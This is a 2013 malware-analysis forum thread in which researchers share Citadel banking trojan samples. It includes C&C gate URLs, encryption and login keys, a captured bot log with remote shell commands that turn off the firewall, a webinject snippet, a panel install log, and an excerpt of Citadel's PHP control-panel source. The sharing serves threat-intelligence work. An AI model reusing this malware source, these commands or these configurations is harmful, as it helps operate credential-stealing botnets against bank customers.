A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21358  by Xylitol
 Thu Nov 07, 2013 11:29 am
Citadel targeting wellsfargo
Code: Select all
Drop: hxtp://fragmentationclicked.net/ma/so/gate.php
Update: hxtp://fragmentationclicked.net/ma/so/file.php|file=soft.exe
Key: BC 9D 3E 27 85 9B 87 13 3A 5C E9 4C 73 2D 79 54
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
haha:
Code: Select all
================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=1
rtime=06:03:54 05.11.2013
time_system=06:03:26 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Wininet(Internet Explorer) cookies:

Path: wiki.wireshark.org/
__utma=44101410.1372036583.1345021049.1345021049.1345021049.1
__utmb=44101410.1.10.1345021049
__utmz=44101410.1345021049.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)



================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=400
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:07
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
1: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
2: Microsoft Corporation | Update for Windows XP (KB898461) | 1
3: Microsoft Corporation | Hotfix for Windows XP (KB942288-v3) | 3
4: Microsoft Corporation | Hotfix for Windows XP (KB954550-v5) | 5
5: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | Unknown
6: David Zimmer | SysAnalyzer 1.0 | Unknown
7: CACE Technologies | WinPcap 4.1.1 | 4.1.0.1753
8: Unknown | WinRAR archiver | Unknown
9: The Wireshark developer community, http://www.wireshark.org | Wireshark 1.2.9 | 1.2.9
10: Safer Networking Limited | FileAlyzer | 1.6.0.4
11: Microsoft Corporation | WebFldrs XP | 9.50.7523
12: Microsoft Corporation | Microsoft Software Update for Web Folders  (English) 12 | 12.0.4518.1014
13: Microsoft Corporation | Microsoft Office Access MUI (English) 2007 | 12.0.4518.1014
14: Microsoft Corporation | Microsoft Office Excel MUI (English) 2007 | 12.0.4518.1014
15: Microsoft Corporation | Microsoft Office PowerPoint MUI (English) 2007 | 12.0.4518.1014
16: Microsoft Corporation | Microsoft Office Publisher MUI (English) 2007 | 12.0.4518.1014
17: Microsoft Corporation | Microsoft Office Outlook MUI (English) 2007 | 12.0.4518.1014
18: Microsoft Corporation | Microsoft Office Word MUI (English) 2007 | 12.0.4518.1014
19: Microsoft Corporation | Microsoft Office Proof (English) 2007 | 12.0.4518.1014
20: Microsoft Corporation | Microsoft Office Proof (French) 2007 | 12.0.4518.1014
21: Microsoft Corporation | Microsoft Office Proof (Spanish) 2007 | 12.0.4518.1014
22: Microsoft Corporation | Microsoft Office Proofing (English) 2007 | 12.0.4518.1014
23: Microsoft Corporation | Microsoft Office Enterprise 2007 | 12.0.4518.1014
24: Microsoft Corporation | Microsoft Office InfoPath MUI (English) 2007 | 12.0.4518.1014
25: Microsoft Corporation | Microsoft Office Shared MUI (English) 2007 | 12.0.4518.1014
26: Microsoft Corporation | Microsoft Office OneNote MUI (English) 2007 | 12.0.4518.1014
27: Microsoft Corporation | Microsoft Office Groove MUI (English) 2007 | 12.0.4518.1014
28: Microsoft Corporation | Microsoft Office Groove Setup Metadata MUI (English) 2007 | 12.0.4518.1014
29: Microsoft Corporation | Microsoft Office Shared Setup Metadata MUI (English) 2007 | 12.0.4518.1014
30: Microsoft Corporation | Microsoft Office Access Setup Metadata MUI (English) 2007 | 12.0.4518.1014
31: Microsoft Corporation | Microsoft .NET Framework 3.0 Service Pack 2 | 3.2.30729
32: Microsoft Corporation | Microsoft .NET Framework 2.0 Service Pack 2 | 2.2.30729
33: Microsoft Corporation | Microsoft .NET Framework 3.5 SP1 | 3.5.30729
34: Microsoft Corporation | Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) | 1
35: VMware, Inc. | VMware Tools | 8.4.5.14951



================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=402
rtime=06:06:55 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown



================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=401
rtime=06:06:56 05.11.2013
time_system=06:03:27 05.11.2013
time_tick=00:48:08
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Company: Unknown
Product: Unknown
Version: Unknown



================================================================================
bot_id=MCAFEE-7BEE0E38_7875768FA3627FE2
botnet=CIT
bot_version=1.3.5.1
ipv4=122.164.254.109
country=??
type=300
rtime=06:06:56 05.11.2013
time_system=06:03:42 05.11.2013
time_tick=00:48:22
time_localbias=+0:00
os_version=XP, SP 3
language_id=1033
process_name=C:\WINDOWS\Explorer.EXE
process_info=Microsoft Corporation | Microsoft® Windows® Operating System | 6.00.2900.5512
process_user=MCAFEE-7BEE0E38\Administrator
path_source=
context=
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>
C:\Documents and Settings\Administrator>prompt $Q$Q$Q$Q$Q$Q$Q$Q$Q$Q[ $P ]$G

==========[ C:\Documents and Settings\Administrator ]>hostname
mcafee-7bee0e38

==========[ C:\Documents and Settings\Administrator ]>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     556 Console                 0        372 K
csrss.exe                    616 Console                 0      4,568 K
winlogon.exe                 640 Console                 0     11,140 K
services.exe                 684 Console                 0      8,016 K
lsass.exe                    696 Console                 0      1,780 K
vmacthlp.exe                 852 Console                 0      2,368 K
svchost.exe                  896 Console                 0      4,856 K
svchost.exe                  976 Console                 0      4,364 K
svchost.exe                 1076 Console                 0     23,952 K
svchost.exe                 1132 Console                 0      3,388 K
svchost.exe                 1228 Console                 0      4,304 K
explorer.exe                1508 Console                 0     15,812 K
spoolsv.exe                 1564 Console                 0      7,492 K
VMwareTray.exe              1972 Console                 0      5,848 K
VMwareUser.exe              1984 Console                 0     13,732 K
vmtoolsd.exe                1776 Console                 0      9,028 K
VMUpgradeHelper.exe         2028 Console                 0      3,884 K
TPAutoConnSvc.exe            480 Console                 0      3,976 K
alg.exe                     1412 Console                 0      3,420 K
wscntfy.exe                 1700 Console                 0      6,340 K
TPAutoConnect.exe           1740 Console                 0      8,260 K
wuauclt.exe                  864 Console                 0      8,540 K
ctfmon.exe                  1152 Console                 0      7,144 K
mscorsvw.exe                2476 Console                 0      3,868 K
wireshark.exe               3468 Console                 0     11,696 K
procexp.exe                 3440 Console                 0     11,796 K
dumpcap.exe                 1600 Console                 0      8,748 K
sysAnalyzer.exe             3876 Console                 0     11,136 K
regshot.exe                 3944 Console                 0     34,092 K
msiexec.exe                 3624 Console                 0     16,632 K
wuauclt.exe                  816 Console                 0      6,548 K
EXCEL.EXE                    848 Console                 0     27,040 K
rundll32.exe                2884 Console                 0      7,672 K
cmd.exe                      336 Console                 0      3,800 K
tasklist.exe                3548 Console                 0      7,796 K
wmiprvse.exe                2148 Console                 0      5,540 K

==========[ C:\Documents and Settings\Administrator ]>ipconfig /all


Windows IP Configuration



        Host Name . . . . . . . . . . . . : mcafee-7bee0e38

        Primary Dns Suffix  . . . . . . . : 

        Node Type . . . . . . . . . . . . : Hybrid

        IP Routing Enabled. . . . . . . . : No

        WINS Proxy Enabled. . . . . . . . : No

        DNS Suffix Search List. . . . . . : localdomain



Ethernet adapter Local Area Connection:



        Connection-specific DNS Suffix  . : localdomain

        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

        Physical Address. . . . . . . . . : 00-0C-29-78-26-70

        Dhcp Enabled. . . . . . . . . . . : Yes

        Autoconfiguration Enabled . . . . : Yes

        IP Address. . . . . . . . . . . . : 192.168.182.128

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 192.168.182.2

        DHCP Server . . . . . . . . . . . : 192.168.182.254

        DNS Servers . . . . . . . . . . . : 192.168.182.2

        Primary WINS Server . . . . . . . : 192.168.182.2

        Lease Obtained. . . . . . . . . . : Tuesday, November 05, 2013 11:30:49 AM

        Lease Expires . . . . . . . . . . : Tuesday, November 05, 2013 12:00:49 PM


==========[ C:\Documents and Settings\Administrator ]>netsh firewall set opmode disable
Ok.


==========[ C:\Documents and Settings\Administrator ]>
==========[ C:\Documents and Settings\Administrator ]>exit
Code: Select all
htxp://46.183.220.124/demi/web.exe
https://www.virustotal.com/en/file/ec4fa711aa76c8ae7a218481c39f425a4aac86fe34c4fdceabc86596e1c6d592/analysis/1383824478/
https://zeustracker.abuse.ch/monitor.ph ... licked.net
Attachments
infected
(5.8 KiB) Downloaded 53 times
 #21359  by Xylitol
 Thu Nov 07, 2013 3:32 pm
Citadel targeting America, United Kingdom, paypal and some branch of spanish banks.
Code: Select all
Drop: hxtp://eltrico.net/bro/gate.php
Update: hxtp://eltrico.net/bro/file.php|file=soft.exe
Key: 30 74 4C 83 0C 9A 27 8C AB 2E 0E 91 18 53 5E 19
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
https://zeustracker.abuse.ch/monitor.ph ... ltrico.net
This one have interesting webinjects, there is even some comments, pop-up injections, pretty big.. it asks many questions.
Code: Select all
// Control frequency of the pop up:
//"always", for every time page loads OR
//"x hours" for once per x hours, where x is an integer (ie: 12 hours)

var popfrequency="48 hours"

///No editing beyond here required/////   
Attachments
infected
(50.71 KiB) Downloaded 73 times
 #21362  by Xylitol
 Thu Nov 07, 2013 5:12 pm
Citadel targeting wellsfargo
Code: Select all
Drop: hxtp://searsholding.co.uk/nonso/gate.php
Update: hxtp://searsholding.co.uk/nonso/file.php|file=soft.exe
Key: 98 78 B1 DF 74 37 51 F3 0F EF 43 25 19 F6 40 89
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Code: Select all
Drop: hxtp://searsholding.co.uk/chuka/gate.php
Update: hxtp://searsholding.co.uk/chuka/file.php|file=soft.exe
Key: 98 78 B1 DF 74 37 51 F3 0F EF 43 25 19 F6 40 89
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Sample courtesy of ChrisBmalc0de
Attachments
infected
(9.88 KiB) Downloaded 58 times
 #21382  by Xylitol
 Tue Nov 12, 2013 10:55 am
Attachments
infected
(7.38 KiB) Downloaded 73 times
 #21388  by Xylitol
 Wed Nov 13, 2013 5:20 pm
Citadel targeting Australia, America, New Zealand, libertyreserve (lol?) and some gambling/bets websites, sample courtesy of Kafeine.
Code: Select all
Drop: hxtp://wenndxend.com/m.php
Update: hxtp://wenndxend.com/ib.php|file=afile.bin
Key: 91 AC 9D 9D D5 6B 2B C4 FA 5F 65 CC 58 25 09 78
Login key: A14B6E0D78C5495E46A207D5B4C32E6B
John Doe 25 http://www.kernelmode.info/forum/viewto ... 272#p21272 & http://www.kernelmode.info/forum/viewto ... =70#p20844
https://zeustracker.abuse.ch/monitor.ph ... ndxend.com
https://www.virustotal.com/fr/file/cf9f ... 384363289/
Attachments
infected
(385.9 KiB) Downloaded 73 times
 #21399  by EX!
 Thu Nov 14, 2013 4:01 pm
Citadel.

Target:
#*wellsfargo.com/*
@*payment.com/*
*facebook.com/*

Gate:
Code: Select all
hxxp://newsamplesproduct.com/css/styles/4/2/3/2/2/3/a/s/d/f/doc/gate.php

hxxp://newsamplesproduct.com/css/styles/4/2/3/2/2/3/a/s/d/f/doc/file.php|file=soft.exe#N
hxxp://newsamplesproduct.com/css/styles/4/2/3/2/2/3/a/s/d/f/doc/gate.php2N
hxxp://newsamplesproduct.com/css/styles/4/2/3/2/2/3/a/s/d/f/doc/file.php$N
hxxp://reserve-host1/fold
ile.php|
https://zeustracker.abuse.ch/monitor.ph ... roduct.com

payment.exe : https://www.virustotal.com/es-ar/file/e ... 384438375/

payload: https://www.virustotal.com/es-ar/file/0 ... 384440903/
Attachments
passw=infected
(1.13 MiB) Downloaded 83 times
 #21414  by Xylitol
 Mon Nov 18, 2013 12:07 pm
Citadel targeting Japan.
Code: Select all
Drop: hxtp://growertyyyyyy150.com/ppp/
Update: hxtp://growertyyyyyy150.com/ppp/file.php|file=jj03.exe
Key: DD FB 2F 07 49 AB 4B C5 F6 C0 D1 22 C4 05 B0 10
Login key: D52C3A25FB86B4660219344E1BC5A755
Same enc key as http://www.kernelmode.info/forum/viewto ... =60#p20700 & http://www.kernelmode.info/forum/viewto ... =80#p21178 & http://www.kernelmode.info/forum/viewto ... =80#p21222 & http://www.kernelmode.info/forum/viewto ... =80#p21250 & http://www.kernelmode.info/forum/viewto ... =80#p21264 & http://www.kernelmode.info/forum/viewto ... =90#p21284 & http://www.kernelmode.info/forum/viewto ... =90#p21317 & http://www.kernelmode.info/forum/viewto ... 414#p21382
---
Weird C&C also founds (not related to the Japan Citadel):
Image Image Image
Code: Select all
• [0] - Connecting to MySQL as 'valdemar_2014'.
• [0] - Selecting DB 'valdemar_2014'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130926'.
• [0] - Updating table 'botnet_reports_130927'.
• [0] - Updating table 'botnet_reports_130930'.
• [0] - Updating table 'botnet_reports_131001'.
• [0] - Updating table 'botnet_reports_131002'.
• [0] - Updating table 'botnet_reports_131004'.
• [0] - Updating table 'botnet_reports_131005'.
• [0] - Updating table 'botnet_reports_131006'.
• [0] - Updating table 'botnet_reports_131007'.
• [0] - Updating table 'botnet_reports_131008'.
• [0] - Updating table 'botnet_reports_131009'.
• [0] - Updating table 'botnet_reports_131011'.
• [0] - Updating table 'botnet_reports_131012'.
• [0] - Updating table 'botnet_reports_131013'.
• [0] - Updating table 'botnet_reports_131014'.
• [0] - Updating table 'botnet_reports_131015'.
• [0] - Updating table 'botnet_reports_131016'.
• [0] - Updating table 'botnet_reports_131017'.
• [0] - Updating table 'botnet_reports_131018'.
• [0] - Updating table 'botnet_reports_131019'.
• [0] - Updating table 'botnet_reports_131020'.
• [0] - Updating table 'botnet_reports_131021'.
• [0] - Updating table 'botnet_reports_131022'.
• [0] - Updating table 'botnet_reports_131023'.
• [0] - Updating table 'botnet_reports_131024'.
• [0] - Updating table 'botnet_reports_131025'.
• [0] - Updating table 'botnet_reports_131026'.
• [0] - Updating table 'botnet_reports_131027'.
• [0] - Updating table 'botnet_reports_131028'.
• [0] - Updating table 'botnet_reports_131029'.
• [0] - Updating table 'botnet_reports_131030'.
• [0] - Updating table 'botnet_reports_131031'.
• [0] - Updating table 'botnet_reports_131101'.
• [0] - Updating table 'botnet_reports_131102'.
• [0] - Updating table 'botnet_reports_131103'.
• [0] - Updating table 'botnet_reports_131104'.
• [0] - Updating table 'botnet_reports_131105'.
• [0] - Updating table 'botnet_reports_131106'.
• [0] - Updating table 'botnet_reports_131107'.
• [0] - Updating table 'botnet_reports_131108'.
• [0] - Updating table 'botnet_reports_131114'.
• [0] - Updating table 'botnet_reports_131115'.
• [0] - Updating table 'botnet_reports_131116'.
• [0] - Updating table 'botnet_reports_131117'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [1] - Updating table 'cp_users'.
• [1] - Updating table 'botnet_scripts'.
• [1] - Updating table 'botnet_scripts_stat'.
• [1] - Updating table 'botnet_software_stat'.
• [1] - Updating table 'exe_updates'.
• [1] - Updating table 'exe_updates_crypter'.
• [1] - Updating table 'botnet_rep_domains'.
• [1] - Updating table 'botnet_rep_domainlogs'.
• [1] - Updating table 'accparse_rules'.
• [1] - Updating table 'accparse_accounts'.
• [1] - Updating table 'vnc_bot_connections'.
• [1] - Updating table 'botnet_rep_dedup'.
• [1] - Updating table 'jabber_messages'.
• [1] - Updating table 'botnet_rep_iframer'.
• [1] - Updating table 'botnet_rep_filehunter'.
• [1] - Updating table 'botnet_screenshots'.
• [1] - Updating table 'botnet_rep_favorites'.
• [1] - Updating table 'botnet_activity'.
• [1] - Updating table 'botnet_hatkeeper'.
• [1] - Updating table 'botnet_webinjects_group'.
• [1] - Updating table 'botnet_webinjects_group_perms'.
• [1] - Updating table 'botnet_webinjects'.
• [1] - Updating table 'botnet_webinjects_bundle'.
• [1] - Updating table 'botnet_webinjects_bundle_execlim'.
• [1] - Updating table 'botnet_webinjects_bundle_members'.
• [1] - Updating table 'botnet_webinjects_history'.
• [1] - Updating table 'svc_mail_tasks'.
• [1] - Updating table 'svc_mail_emails'.
• [1] - Updating table 'neurostat_profiles'.
• [1] - Updating table 'neurostat_criteria'.
• [1] - Updating table 'neurostat_analyses'.
• [1] - Updating table 'neurostat_analysis_bots'.
• [1] - Updating table 'neurostat_analysis_data'.
• [1] - Updating table 'botnet_rep_balance'.
• [1] - Updating table 'botnet_flashinfect_devices'.
• [1] - Updating table 'notes'.
• [1] - Updating table 'tokenspy_rules'.
• [1] - Updating table 'tokenspy_bots_state'.
• [1] - Updating table 'tokenspy_bots_history'.
• [1] - Updating table 'tokenspy_bots_posted'.
• [1] - Updating table 'tokenspy_page_presets'.
• [1] - Creating folder '_reports1025456805'.
• [1] - Writing config file
• [1] - Searching for the god particle...
• [1] - Creating folder 'system/data'.
• [1] - Creating folder 'system/data/TokenSpy'.
• [1] - Creating folder 'system/data/TokenSpy/templates'.
• [1] - Creating folder 'system/data/TokenSpy/pages'.
• [1] - Creating folder 'system/data/TokenSpy/skeletons'.
• [1] - Creating folder 'public'.
• [1] - Creating folder 'files'.
• [1] - Creating folder 'files/webinjects'.
-- Update complete! --
https://www.virustotal.com/en/ip-addres ... formation/ - https://zeustracker.abuse.ch/monitor.ph ... operope.ru
I've added 'santroperope.ru.zip' in attahcement who contain probably the related Citadel i will check that later.
https://www.virustotal.com/en/file/371b ... 384784646/
https://www.virustotal.com/en/file/4760 ... 384784650/
This one is confirmed: https://www.virustotal.com/en/file/e378 ... 384794087/
In attachement '1e9a890f92e2b9a327d253f82b24844a.zip' anyway as domain and backup domains are dead... looking for config if anyone can deliver ? ;)
Just for info:
Code: Select all
Citadel 1.2.0.0
Key: 63 D9 E8 05 90 D5 09 66 6D 78 15 9E 6A 69 05 B2
Login key: A9B0A3F1522313D46F7A3D00A5F3C5FE
John Doe 55.
---
Two Citadel on SSL:
Image Image
Not referenced on the ZeuS tracker, and virustotal doesn't really have infos at all
https://www.virustotal.com/en/ip-addres ... formation/ - https://www.virustotal.com/en/ip-addres ... formation/
Note that there is no option 'Remember (MD5 cookies)' on the login form.
---
Citadel Turkish translation:
Image
https://zeustracker.abuse.ch/monitor.ph ... rectme.net

And S21 guys released a V2 of their Zeus timeline: http://securityblog.s21sec.com/2013/11/ ... ne-ii.html
Attachments
infected
(270.79 KiB) Downloaded 77 times
infected
(364.34 KiB) Downloaded 83 times
infected
(4.55 KiB) Downloaded 70 times
 #21429  by Xylitol
 Thu Nov 21, 2013 11:57 am
https://www.virustotal.com/en/file/3e38 ... 385034775/
Image
Code: Select all
Version: 1.3.5.1
Build time: 22:02:25 09.10.2012 GMT
Signature: vortex1772_second
Login key: D13BD90340B64BE3877E4A0E10BBC80A
John Doe 11, who seem related to shylock
Image
Code: Select all
<?php error_reporting(E_ALL); set_time_limit(0); mb_internal_encoding('UTF-8'); mb_regex_encoding('UTF-8'); umask(0);

///////////////////////////////////////////////////////////////////////////////////////////////////
// Константы.
///////////////////////////////////////////////////////////////////////////////////////////////////

//Кодовая странци для MySQL.
define('MYSQL_CODEPAGE', 'utf8');
define('MYSQL_COLLATE',  'utf8_unicode_ci');

//Ботнет по умолчанию. Менять не рекомендуется.
define('DEFAULT_BOTNET', '-- default --');

//Некотрые данные о протоколе.
define('HEADER_SIZE',      48); //sizeof(BinStorage::STORAGE)
define('HEADER_MD5',       32); //OFFSETOF(BinStorage::STORAGE, MD5Hash)
define('ITEM_HEADER_SIZE', 16); //sizeof(BinStorage::ITEM)

//Конастанты сгенерированые из defines.php
define('SBCID_BOT_ID', 10001);
define('SBCID_BOTNET', 10002);
define('SBCID_BOT_VERSION', 10003);
define('SBCID_NET_LATENCY', 10005);
define('SBCID_TCPPORT_S1', 10006);
define('SBCID_PATH_SOURCE', 10007);
define('SBCID_PATH_DEST', 10008);
define('SBCID_TIME_SYSTEM', 10009);
define('SBCID_TIME_TICK', 10010);
define('SBCID_TIME_LOCALBIAS', 10011);
define('SBCID_OS_INFO', 10012);
define('SBCID_LANGUAGE_ID', 10013);
define('SBCID_PROCESS_NAME', 10014);
define('SBCID_PROCESS_USER', 10015);
define('SBCID_IPV4_ADDRESSES', 10016);
define('SBCID_IPV6_ADDRESSES', 10017);
define('SBCID_BOTLOG_TYPE', 10018);
define('SBCID_BOTLOG', 10019);
define('SBCID_PROCESS_INFO', 10020);
define('SBCID_LOGIN_KEY', 10021);
define('SBCID_REQUEST_FILE', 10022);
define('SBCID_REFERAL_LINK', 10023);
define('SBCID_ADMIN_GROUP', 10024);
define('SBCID_BATTERY_INFO', 10025);
define('SBCID_SCRIPT_ID', 11000);
define('SBCID_SCRIPT_STATUS', 11001);
define('SBCID_SCRIPT_RESULT', 11002);
define('SBCID_MODULES_TYPE', 12000);
define('SBCID_MODULES_VERSION', 12001);
define('SBCID_MODULES_DATA', 12002);
define('CFGID_LAST_VERSION', 20001);
define('CFGID_LAST_VERSION_URL', 20002);
define('CFGID_URL_SERVER_0', 20003);
define('CFGID_URL_ADV_SERVERS', 20004);
define('CFGID_HTTP_FILTER', 20005);
define('CFGID_HTTP_POSTDATA_FILTER', 20006);
define('CFGID_HTTP_INJECTS_LIST', 20007);
define('CFGID_DNS_LIST', 20008);
define('CFGID_DNS_FILTER', 20009);
define('CFGID_CMD_LIST', 20010);
define('CFGID_HTTP_MAGICURI_LIST', 20011);
define('CFGID_FILESEARCH_KEYWORDS', 20012);
define('CFGID_FILESEARCH_EXCLUDES_NAME', 20013);
define('CFGID_FILESEARCH_EXCLUDES_PATH', 20014);
define('CFGID_KEYLOGGER_PROCESSES', 20015);
define('CFGID_KEYLOGGER_TIME', 20016);
define('CFGID_FILESEARCH_MINYEAR', 20017);
define('CFGID_WEBINJECTS_URL', 20018);
define('CFGID_TOKENSPY_URL', 20019);
define('CFGID_HTTPVIP_URLS', 20020);
define('CFGID_VIDEO_QUALITY', 20101);
define('CFGID_VIDEO_LENGTH', 20102);
define('BLT_UNKNOWN', 0);
define('BLT_COOKIES', 1);
define('BLT_FILE', 2);
define('BLT_DEBUG', 3);
define('BLT_HTTP_REQUEST', 11);
define('BLT_HTTPS_REQUEST', 12);
define('BLT_LUHN10_REQUEST', 13);
define('BLT_LOGIN_FTP', 100);
define('BLT_LOGIN_POP3', 101);
define('BLT_FILE_SEARCH', 102);
define('BLT_KEYLOGGER', 103);
define('BLT_MEGAPACKAGE', 1000);
define('BLT_GRABBED_UI', 200);
define('BLT_GRABBED_HTTP', 201);
define('BLT_GRABBED_WSOCKET', 202);
define('BLT_GRABBED_FTPSOFTWARE', 203);
define('BLT_GRABBED_EMAILSOFTWARE', 204);
define('BLT_GRABBED_OTHER', 299);
define('BLT_COMMANDLINE_RESULT', 300);
define('BLT_ANALYTICS_SOFTWARE', 400);
define('BLT_ANALYTICS_FIREWALL', 401);
define('BLT_ANALYTICS_ANTIVIRUS', 402);
define('BMT_VIDEO', 1);
define('BMT_FFCOOKIE', 2);
define('BOT_ID_MAX_CHARS', 100);
define('BOTNET_MAX_CHARS', 20);
define('BOTCRYPT_MAX_SIZE', 409600);
define('MAXLIMIT', 101);
define('BO_CLIENT_VERSION', '1.3.5.1');
define('BO_LOGIN_KEY', 'D13BD90340B64BE3877E4A0E10BBC80A');
define('BO_CRYPT_SALT', 0x4FE493C0);
define('BO_REFERAL', 0);

# BLT_DEBUG report type, path_source
define('BLT_DEBUG_PATHSRC_WEBINJECTS', 35);

///////////////////////////////////////////////////////////////////////////////////////////////////
// Функции.
///////////////////////////////////////////////////////////////////////////////////////////////////

/*
  Добавление заголовков HTTP для предотврашения кэширования браузером.
*/
function httpNoCacheHeaders()
{
  header('Expires: Fri, 01 Jan 1990 00:00:00 GMT'); //...
  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0'); //HTTP/1.1
  header('Pragma: no-cache'); // HTTP/1.0
}

/*
  Проверяет сущетвует ли в путе указатель на уровень выше '..'.
  
  IN $path - string, путь для проверки.
  
  Return   - bool, true - если сущетвует, false - если не сущетвует.
*/
function pathUpLevelExists($path)
{
  return (strstr('/'.str_replace('\\', '/', $path).'/', '/../') === false ? false : true);
}

/*
  Надстройка над basename, которая обрабатывает оба типа слеша, независимо от платформы.
  
  IN $path - string, строка для обработки.
  
  Return   - string, базовое имя.
*/
function baseNameEx($path)
{
  return basename(str_replace('\\', '/', $path));
}

/*
  Преобразование GMT в текстовое представление.
  
  IN $bias - int, GMT в секундах.
  
  Return   - string, GMT в текстовое представление.
*/
function timeBiasToText($bias)
{
  return ($bias >= 0 ? '+' : '-').abs(intval($bias / 3600)).':'.sprintf('%02u', abs(intval($bias % 60)));
}

/*
  Преобразование TickCount в hh:mm:ss
  
  IN $tc - int, TickCount.
  
  Return - string, hh:mm:ss.
*/
function tickCountToText($tc)
{
  return sprintf('%02u:%02u:%02u', $tc / 3600, $tc / 60 - (sprintf('%u', ($tc / 3600)) * 60), $tc - (sprintf('%u', ($tc / 60)) * 60));
}

/*
  Добавление слешей в стиле JavaScript.
  
  IN $string - string, строка для обработки.
  
  Return     - форматированя строка.
*/
function addJsSlashes($string)
{
  return addcslashes($string, "\\/\'\"");
}

/*
  Надстройка для htmlentities, для форматирования в UTF-8.
  
  IN $string - string, строка для обработки.
  
  Return     - форматированя строка.
*/
function htmlEntitiesEx($string)
{
  /*
    HTML uses the standard UNICODE Consortium character repertoire, and it leaves undefined (among
    others) 65 character codes (0 to 31 inclusive and 127 to 159 inclusive) that are sometimes
    used for typographical quote marks and similar in proprietary character sets.
  */
  return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
}

/*
  Надстройка для number_format, для форматирования в int формате для текущего языка.
  
  IN $number - int, число для обработки.
  
  Return     - string, отформатированое число.
*/
function numberFormatAsInt($number)
{
  return number_format($number, 0, '.', ' ');
}

/*
  Надстройка для number_format, для форматирования в float формате для текущего языка.
  
  IN $number   - float, число для обработки.
  IN $decimals - количетсво цифр в дробной части.
  
  Return     - string, отформатированое число.
*/
function numberFormatAsFloat($number, $decimals)
{
  return number_format($number, $decimals, '.', ' ');
}

/*
  Преобразование числа в версию.
  
  IN $i  - int, число для обработки.
  
  Return - string, версия.
*/
function intToVersion($i)
{
  return sprintf("%u.%u.%u.%u", ($i >> 24) & 0xFF, ($i >> 16) & 0xFF,($i >> 8) & 0xFF, $i & 0xFF);
}

/*
  Конвертация данных о версии OS в строку.
  
  IN $os_data - string, данные OS.
  
  Return      - string, строквое представление версии OS.
*/
function osDataToString($os_data)
{
  $name = 'Unknown';
  if(strlen($os_data) == 6 /*sizeof(OSINFO)*/)
  {
    $data = @unpack('Cversion/Csp/Sbuild/Sarch', $os_data);
    
    //Базовое название.
    switch($data['version'])
    {
      case 2: $name = 'XP'; break;
      case 3: $name = 'Server 2003'; break;
      case 4: $name = 'Vista'; break;
      case 5: $name = 'Server 2008'; break;
      case 6: $name = 'Seven'; break;
      case 7: $name = 'Server 2008 R2'; break;
    }
    
    //Архитектура.
    if($data['arch'] == 9 /*PROCESSOR_ARCHITECTURE_AMD64*/)$name .= ' x64';
   
    //Сервиспак.
    if($data['sp'] > 0)$name .= ', SP '.$data['sp'];
  }
  return $name;
}

/*
  Конвертация строки в строку с закоментроваными спец. символами SQL маски.
  
  IN $str - string, исходная строка.
  
  Return  - string, конченая строка.
*/
function toSqlSafeMask($str)
{
  return str_replace(array('%', '_'), array('\%', '\_'), $str);
}

/*
  Получение списка таблиц отчетов по дням.
  
  IN $db - string, БД, из которой будет получены таблицы.
  
  Return - array, список таблиц, отсортированый по имени.
*/
function listReportTables($db = null)
{
    $from = empty($db)? '' : " FROM `$db` ";
    $r = mysql_query('SHOW TABLES LIKE "botnet_reports_%";');
    $tables = array();
    while (!is_bool($t = mysql_fetch_row($r)))
        $tables[] = $t[0];
    sort($tables);
    return $tables;
}

/*
  Проверка корректности значений переменной из массива $_POST.

  IN $name     - string, имя.
  IN $min_size - минимальная длина.
  IN $max_size - максимальная длина.

  Return       - NULL - если не значение не походит под условия,
                 string - значение переменной.
*/
function checkPostData($name, $min_size, $max_size)
{
  $data = isset($_POST[$name]) ? trim($_POST[$name]) : '';
